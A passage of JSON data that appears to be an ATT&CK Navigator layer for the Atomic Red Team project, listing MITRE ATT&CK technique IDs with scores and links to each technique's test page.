Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1056.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1056","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1069","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1071","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1078","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1087","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1127.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1127","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1136","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1222","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1484","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491.001","score":100,"enabled":true,"links":[{"label":"View 